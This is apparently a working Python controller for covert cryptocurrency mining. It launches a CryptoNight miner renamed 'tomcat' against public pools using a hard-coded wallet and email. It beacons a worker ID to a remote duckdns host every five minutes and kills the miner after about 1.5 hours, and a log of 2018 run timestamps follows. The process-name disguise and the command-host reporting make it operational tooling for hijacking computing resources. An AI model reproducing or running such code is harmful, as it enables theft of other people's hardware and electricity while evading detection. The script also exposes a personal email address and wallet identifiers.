import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:22:06.720223
#2018-02-17 17:10:08.802239
#2018-02-17 18:58:06.453754
#2018-02-17 20:47:05.253371
#2018-02-17 22:34:06.634066
#2018-02-18 00:18:03.932884
#2018-02-18 02:08:07.700551
#2018-02-18 03:57:05.412791
#2018-02-18 05:46:05.334667
#2018-02-18 07:39:05.865652
#2018-02-18 09:26:03.844925
#2018-02-18 11:12:01.551577
#2018-02-18 12:58:07.825109
#2018-02-18 14:47:07.113547
#2018-02-18 16:36:03.789568
#2018-02-18 18:25:06.001398
#2018-02-18 20:12:06.418986
#2018-02-18 21:58:06.972722
#2018-02-18 23:47:05.950293
#2018-02-19 01:33:05.058569
#2018-02-19 03:21:07.394202
#2018-02-19 05:06:07.242502
#2018-02-19 06:53:06.967366
#2018-02-19 08:41:06.892497
#2018-02-19 10:30:05.195906
#2018-02-19 12:17:08.324496
#2018-02-19 14:04:05.795909
#2018-02-19 15:53:06.191276
#2018-02-19 17:41:04.536253
#2018-02-19 19:28:07.566947
#2018-02-19 21:16:07.646607
#2018-02-19 23:02:03.714342
#2018-02-20 00:47:01.980540
#2018-02-20 02:38:04.869331
#2018-02-20 04:27:04.247165
#2018-02-20 06:12:01.941146
#2018-02-20 07:57:01.586387
#2018-02-20 09:42:01.979380
#2018-02-20 11:26:04.055300
#2018-02-20 13:12:08.520543
#2018-02-20 14:57:08.071652
#2018-02-20 16:43:09.941799
#2018-02-20 18:31:04.602298
#2018-02-20 20:21:07.230556
#2018-02-20 22:06:06.392780
#2018-02-20 23:46:07.738149
#2018-02-21 01:34:06.965574
#2018-02-21 03:21:06.651933
#2018-02-21 05:08:03.485282
#2018-02-21 06:55:07.204348
#2018-02-21 08:42:01.639324
#2018-02-21 10:27:07.371319
#2018-02-21 12:14:07.148463
#2018-02-21 14:03:02.027978
#2018-02-21 15:47:01.416886
#2018-02-21 17:38:08.090298
#2018-02-21 19:25:07.015218
#2018-02-21 21:15:04.908896
#2018-02-21 23:03:06.089830
#2018-02-22 00:52:07.990502
#2018-02-22 02:39:07.811387
#2018-02-22 04:26:04.274639
#2018-02-22 06:11:07.928718
#2018-02-22 07:55:06.919511
#2018-02-22 09:43:04.410740
#2018-02-22 11:28:05.612177
#2018-02-22 13:14:06.892070
#2018-02-22 15:04:07.656954
#2018-02-22 16:48:05.696697
#2018-02-22 18:34:01.811367
#2018-02-22 20:26:01.727568
#2018-02-22 22:11:07.058043
#2018-02-22 23:56:08.208159
#2018-02-23 01:45:09.710135
#2018-02-23 03:35:01.476278
#2018-02-23 05:20:08.366310
#2018-02-23 07:05:04.581756
#2018-02-23 08:53:08.310219
#2018-02-23 11:13:06.152004
#2018-02-23 13:08:07.500806
#2018-02-23 14:52:09.457179
#2018-02-23 16:42:06.727717
#2018-02-23 18:28:07.259212
#2018-02-23 20:11:08.124967
#2018-02-23 21:59:08.415908
#2018-02-23 23:49:01.942684
#2018-02-24 01:36:01.799422
#2018-02-24 03:24:04.762306
#2018-02-24 05:10:06.686059
#2018-02-24 06:59:04.817030
#2018-02-24 08:50:05.343023
#2018-02-24 10:57:05.058424
#2018-02-24 12:44:04.486335
#2018-02-24 14:34:06.519941
#2018-02-24 16:20:08.380625
#2018-02-24 18:14:06.898726
#2018-02-24 20:01:02.194680
#2018-02-24 21:44:01.554991
#2018-02-25 01:53:04.429344
#2018-02-25 05:01:01.883356
#2018-02-25 09:52:02.090052